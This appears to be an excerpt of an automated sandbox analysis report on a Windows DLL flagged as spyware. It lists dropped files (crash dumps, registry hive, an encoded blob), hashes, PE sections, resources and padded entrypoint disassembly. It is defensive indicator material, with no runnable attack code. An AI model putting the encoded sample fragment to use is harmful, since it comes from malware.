.F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.8.4.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER90BA.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4825
                  Entropy (8bit):4.488493388267278
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsdJg77aI9heWpW8VYqvYm8M4JCdPpFI4A+q8vjP3GScSgd:uIjf3I7Pf7VVyJllKDJ3gd
                  MD5:879AC42AEBE4695FDD27E312C92AD03A
                  SHA1:BEF7A7B7B75F5C3FCA366FE35220324C45CDCEE5
                  SHA-256:5DDA25F7DCC253C62579B93C525D529AEB5F13592D57F55AD9269E3EF1012977
                  SHA-512:6933678887A1536070A224227675C732CE7613B782D42AC030C82C047B016013F9C5CFC9C12BCC793A1B496E105D251C075FB3CF1F3D8ED737E5C6C05AFC16D2
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297634" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4DA.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Sat Apr 27 01:32:06 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):43242
                  Entropy (8bit):2.0297108124873273
                  Encrypted:false
                  SSDEEP:192:Buct13g3dfTWVmO5H4itjQ4wtIeXW1fPwen18/X/r5XQ:MeJgN6Vx5HrtjQ4wtIem1fPwe6X/l
                  MD5:8AB41958899772CD9EA36295C6B636ED
                  SHA1:F3E9FB1959E228FFEF743382E31308D431353ABA
                  SHA-256:785866EE111E169BE821691A26D70779BE704B583EAEA30BCAC0779D27FF30EC
                  SHA-512:6381C3A2E7B7CFA1A5F41EDC9E509E7563F4BAA9A86D01DFA44385BC31094106663EF06DC9AB3FABB817032E4106941DFF9841CD5C35941466CDEB5BB68D924D
                  Malicious:false
                  Preview:MDMP..a..... ........U,f.........................................*..........T.......8...........T......................................l...............................................................................eJ..............GenuineIntel............T.......X....U,f.............................0..=...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB547.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Sat Apr 27 01:32:06 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):42046
                  Entropy (8bit):2.020992215331638
                  Encrypted:false
                  SSDEEP:192:BTct13gRdfTWOh2O5H4CQB+YGzvL0ceUSQxBhkWt3KjzZ8:ReJgD6OhB5HuB6SQRDte
                  MD5:C961D7434B77C6570BAA5ECED740E74F
                  SHA1:AD2C1623B6E1EC55127A967C522E74C0E05B22AD
                  SHA-256:1CBB80C37F1AE32778306D9B7A01990A7E0C6FF9D51DCDE71D3D7C3944CEFBD6
                  SHA-512:EAFD4DA808BB90B16A098C2420D59AF7BA453867E42E55288944EDC37DADECBB67D9716F5732698463A76B6F0448F852B1A9A71BB53801EF6F3AE5AB207B8E2E
                  Malicious:false
                  Preview:MDMP..a..... ........U,f.........................................*..........T.......8...........T...............>.......................l...............................................................................eJ..............GenuineIntel............T.......H....U,f.............................0..=...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB5E4.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8368
                  Entropy (8bit):3.699784619060228
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJEjSl69M6YCD66zClkGgmfTNbprB89bxGsfp7m:R6lXJ+O69M6YU66G3gmfTN4xlf4
                  MD5:19DBFBD7108F9A7B2A7D724A32857255
                  SHA1:8AF37E1DD3CDB4FB21C5B5FDCFD52104B50C7CAF
                  SHA-256:0704CA3AE763918F296E0C87E427026CF63488A426C2596CD1DEC35196DC4160
                  SHA-512:F7C6A079B71DD059992174821C083822AAFF37332FDA4CF5E82D2A46E04DF2DF7A151CFD940AD039EF882D527E4F21B5E706D54D8C56B42F814F5FC7742DF47E
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.1.2.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB614.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4724
                  Entropy (8bit):4.503837991186404
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsdJg77aI9heWpW8VY9eYm8M4JCdPQFDv+q8/KOr6GScSDwM6d:uIjf3I7Pf7VCXJ3v2r6J3L6d
                  MD5:F1F3B2948DEA95B1B81370770E228255
                  SHA1:16F7BB339134ED036C5423FC8173523BE84DDA7E
                  SHA-256:E1573E1109B35EBE78E183EF0BDB54691BE87F6ABF557241AD353334DF5FC25D
                  SHA-512:FE85DEE37C0C8689CE05B3E7F88A86904BD1C9E24C66028AD4D52ADCB096C96CEFA2E502F7D9550D653EC9FB7B6533EB35005609E0674182F01A138A803FEC68
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297634" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB671.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8432
                  Entropy (8bit):3.6955105309376513
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJxn646YCD56WlkGgmf8tbpr189bxSsfGb7m:R6lXJR646YU56W3gmf8tUxRfH
                  MD5:29AE28A9BFA2405614AE920DF85146EC
                  SHA1:7F21D705F0E1B6606B0E64CD15498E3803D49BF1
                  SHA-256:437F2CE50FBFA4906D56943717A380E49455AD48834817F30E3819EECDA73F07
                  SHA-512:89B447AE7BEC8A91C758FD54B6605E53D34722FA8834BD366FE7D26BA472C7004340D3A58C77B350CA69C4F63A824245E33499926C51EAA33ADCB021474809DD
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.9.6.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6EF.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4825
                  Entropy (8bit):4.489106726399409
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsdJg77aI9heWpW8VYLYm8M4JCdPpFMw+q8vjPZGScSDd:uIjf3I7Pf7VLJdwKlJ3Dd
                  MD5:F276C91D5B29899D55D3168967DBBFCA
                  SHA1:89F8505DC17BF0A0FEF03014A4FB9C07BBC4CE81
                  SHA-256:47532FB73A77C41F269FC336E04B7C2DE831E9E14A03FAAA6CF74C37410B05E1
                  SHA-512:8065ECC615260B61D2EA68A1128731B83AB43AEBB8C98D062F613913232A7B3206B0607A12737817631AA994498E7FFAF03CA195A98D77754A6ECDA569DA73D1
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297634" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0304PT[1].zip

                  Download File
                  Process:C:\Windows\SysWOW64\rundll32.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):9060352
                  Entropy (8bit):6.039476367937906
                  Encrypted:false
                  SSDEEP:49152:wnmKWqyeOpboJXsQtygEcr7ylV2aJd6sRGfEijE4hcCCqCisj06bRBMBwNIRy2uI:Q
                  MD5:09D35EB93DAF46FA2303F8AC494C8D4F
                  SHA1:0F7445D449B2B257F05BA9F17ABEE05F49CBFF11
                  SHA-256:E97F1B99A1E372356485387DE9ABAEA3A530AEE8ACD915ED115717D797C83F50
                  SHA-512:23202BDD2D70C19B51C6B2E5C66B2494113C590402568FB40DA9552CBFB77A51BA4C67DF6EE8A3AC8D41BECA8E10C40462981FC53146F89FCDF7813A1CC390CF
                  Malicious:false
                  Preview:BmCWznEymczu87iUi8njDLUrmEv///9v/v/2////m4kySuDkAV71INyeiairaRCKQHv4li3wFp+k..7F8q+HvaTycxUqqmfvqO9MfdU0Vskeuzi/sY7ua/E6kj9s4ztJxACjSnKYm89ZW9sBBQS1rEGqWT..6lPlRJYX75WOB9du4o9dndMtBIKv6a7x8ZMxRkhELHfzrAycgBqpegQRwhhhhJiSclQW3PBa20Fk..T43j2D9gmo4jkXHKwIgUieUBtVgAEQIioZmTorsVfn4Skq4owxwmT44CsMnBAaww7HBQpEhowWw7..D/1fFNw8Y4lgJRlvGFgUqFJhyI4d+8a0nBYRVWEMa52+t0UTVQh66/oXSBKo0XN4AThmafTdEuBG..H3uBK01MTze4QrIn9ASb/tBZAtzo4y/4KMNe3WLjcDXtcZSyLvsjnm5E5DlWjmoOOuPI+3w8icXI..FpQHuD3QYVyg7U0ggfC/QR5Jyu0+JRZArYnTmoQp2tgOI9kX4NQaRnojyUJ6wrlNRwob5nQbsAPm..F0MXFbKuawpM07y84xT0ZfiOsCK7sNFIC99dYw4+LLYl6MtP+gDDeTlCDt0XNPyPejXWYLKsS4Kb..Sa4G+DlCqzmbXAvJI38I/8gpOSWn5JScO4cYf9QETwo8q+KXnRIASnql3BWD8NCmmtFxaDelJroY..Q25OnfvxwV9R9KQgmwdUIPLgLq2s/Klme9e83qp5+jeAWcumQjL1/Tt9NXaqSe05JUENRyrp0tkC..EnBRt1TtNp0PKWVxQusEv1HJ4iaM5jkhG3gicAxtRe/PMUC6lRok7r9ZjDQZ1llbvplJTBhot6TK..HjJW3UmqGV6Exx02F1D5nAYrHx5FaLb1hnJnT2nzEDmu+aEBQq0QPgRYOzWEUIk7lOC12FRpZpO1..ZWlOCvM7sYRsfLogtJXY01+I8A+2fSu5yuqm3Qb13Yot5l5CEq6QjbqF9hd4owrZ

                  C:\Windows\appcompat\Programs\Amcache.hve

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1835008
                  Entropy (8bit):4.466242318852595
                  Encrypted:false
                  SSDEEP:6144:bIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSbG:8XD94+WlLZMM6YFHT+G
                  MD5:990467340611AA1DBB599D21A2F86E41
                  SHA1:89215D9298CA8C0F0CBC6FD21E5AA452918E3517
                  SHA-256:1FC1BD21FDDE3B95B958D77060769CE4B151A1602995E4DF5433F7A6BE9CB445
                  SHA-512:394CAA16ABF15D6215368D02F166EDE565E1DFB7C17E1A801291A8A74270A55BB9C98C98D5ACF96568F13354E051C7ECFEE4D2A174104E9625BBAD1909589972
                  Malicious:false
                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....B...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\vstatic\user

                  Download File
                  Process:C:\Windows\SysWOW64\rundll32.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):9060352
                  Entropy (8bit):6.039476367937906
                  Encrypted:false
                  SSDEEP:49152:wnmKWqyeOpboJXsQtygEcr7ylV2aJd6sRGfEijE4hcCCqCisj06bRBMBwNIRy2uI:Q
                  MD5:09D35EB93DAF46FA2303F8AC494C8D4F
                  SHA1:0F7445D449B2B257F05BA9F17ABEE05F49CBFF11
                  SHA-256:E97F1B99A1E372356485387DE9ABAEA3A530AEE8ACD915ED115717D797C83F50
                  SHA-512:23202BDD2D70C19B51C6B2E5C66B2494113C590402568FB40DA9552CBFB77A51BA4C67DF6EE8A3AC8D41BECA8E10C40462981FC53146F89FCDF7813A1CC390CF
                  Malicious:false
                  Preview:BmCWznEymczu87iUi8njDLUrmEv///9v/v/2////m4kySuDkAV71INyeiairaRCKQHv4li3wFp+k..7F8q+HvaTycxUqqmfvqO9MfdU0Vskeuzi/sY7ua/E6kj9s4ztJxACjSnKYm89ZW9sBBQS1rEGqWT..6lPlRJYX75WOB9du4o9dndMtBIKv6a7x8ZMxRkhELHfzrAycgBqpegQRwhhhhJiSclQW3PBa20Fk..T43j2D9gmo4jkXHKwIgUieUBtVgAEQIioZmTorsVfn4Skq4owxwmT44CsMnBAaww7HBQpEhowWw7..D/1fFNw8Y4lgJRlvGFgUqFJhyI4d+8a0nBYRVWEMa52+t0UTVQh66/oXSBKo0XN4AThmafTdEuBG..H3uBK01MTze4QrIn9ASb/tBZAtzo4y/4KMNe3WLjcDXtcZSyLvsjnm5E5DlWjmoOOuPI+3w8icXI..FpQHuD3QYVyg7U0ggfC/QR5Jyu0+JRZArYnTmoQp2tgOI9kX4NQaRnojyUJ6wrlNRwob5nQbsAPm..F0MXFbKuawpM07y84xT0ZfiOsCK7sNFIC99dYw4+LLYl6MtP+gDDeTlCDt0XNPyPejXWYLKsS4Kb..Sa4G+DlCqzmbXAvJI38I/8gpOSWn5JScO4cYf9QETwo8q+KXnRIASnql3BWD8NCmmtFxaDelJroY..Q25OnfvxwV9R9KQgmwdUIPLgLq2s/Klme9e83qp5+jeAWcumQjL1/Tt9NXaqSe05JUENRyrp0tkC..EnBRt1TtNp0PKWVxQusEv1HJ4iaM5jkhG3gicAxtRe/PMUC6lRok7r9ZjDQZ1llbvplJTBhot6TK..HjJW3UmqGV6Exx02F1D5nAYrHx5FaLb1hnJnT2nzEDmu+aEBQq0QPgRYOzWEUIk7lOC12FRpZpO1..ZWlOCvM7sYRsfLogtJXY01+I8A+2fSu5yuqm3Qb13Yot5l5CEq6QjbqF9hd4owrZ

                  Static File Info

                  General

                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.685458585122611
                  TrID:
                  • Win32 Dynamic Link Library (generic) (1002004/3) 86.42%
                  • Inno Setup installer (109748/4) 9.47%
                  • Win32 EXE PECompact compressed (generic) (41571/9) 3.59%
                  • Win16/32 Executable Delphi generic (2074/23) 0.18%
                  • Generic Win/DOS Executable (2004/3) 0.17%
                  File name:SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll
                  File size:6'730'240 bytes
                  MD5:6aa05404541ee29201cdcc5655fc85e5
                  SHA1:8f7053ac558eef33826d17e27eb4e31dcc1c4d81
                  SHA256:0519a9ec136042b2527aa3b8a4010941667df52938c2bc716877c4863be3b314
                  SHA512:5a06714d63bb56f61b6eefb8c8443ac1fdb34ba3cdf9c1509d05fcd05e8c4ec4819820ff357e4f89c0e5d6cef5262e2b2fc56427fbeed1abfb44f0741057a12e
                  SSDEEP:98304:6d1lxgzIrB/UibfL2StFW+V41PteE0+geEaV5zct:8lxjXbfKS/W+e1VeE0+Bu
                  TLSH:91666C17B388713ED0AB0B3A5877E754983FBAA17A168D4757F4188C4F356802E3EA47
                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                  File Icon

                  Icon Hash:7ae282899bbab082

                  Static PE Info

                  General

                  Entrypoint:0x98d238
                  Entrypoint Section:.itext
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x662682B4 [Mon Apr 22 15:31:00 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:14f58cdad3ec8e716e79b4f36fdb99f7

                  Entrypoint Preview

                  Instruction
                  push ebp
                  mov ebp, esp
                  add esp, FFFFFFC0h
                  mov eax, 0097D220h
                  call 00007F4D30F4DD61h
                  call 00007F4D30F45E84h
                  lea eax, dword ptr [eax+00h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x5a80000x10c.edata
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5a30000x3992.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x6270000x50600.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5aa0000x7ce48.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x5a39f40x8c8.idata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x5a70000xeea.didata
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x588e080x589000510d31b7df97497f6db7c6e5a74618edunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .itext0x58a0000x32500x3400791a08d9b12e95a0dae49c6b304559e0False0.5365835336538461data6.330667284792725IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .data0x58e0000xc4e40xc6005f104737d452ba5c79f4ffe22e9dde3aFalse0.5467763573232324data6.065672133691214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .bss0x59b0000x77f40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata0x5a30000x39920x3a0091d9f71892fce8851f4bebd330c2ed3cFalse0.3265759698275862data5.08451887846386IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .didata0x5a70000xeea0x10007e8caef28600377b0351e5fe6d8189acFalse0.33447265625data4.241962753902909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .edata0x5a80000x10c0x200ec752b37627a90838acd63f0c4b59c42False0.443359375data3.2399683359895746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rdata0x5a90000x450x200f39142798bef82e46a62bb98c22ace01False0.158203125ASCII text, with no line terminators1.1963055769675508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x5aa0000x7ce480x7d00076198b24bcb490ddf2b522cb48f60470False0.567265625data6.724027111399175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  .rsrc0x6270000x506000x50600a49fd44cd57b94e9e90c97ff7e8610e7False0.4989672433903577data7.082490925556892IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_CURSOR0x6296400x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                  RT_CURSOR0x6297740x134dataEnglishUnited States0.4642857142857143
                  RT_CURSOR0x6298a80x134dataEnglishUnited States0.4805194805194805
                  RT_CURSOR0x6299dc0x134dataEnglishUnited States0.38311688311688313
                  RT_CURSOR0x629b100x134dataEnglishUnited States0.36038961038961037
                  RT_CURSOR0x629c440x134dataEnglishUnited States0.4090909090909091
                  RT_CURSOR0x629d780x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
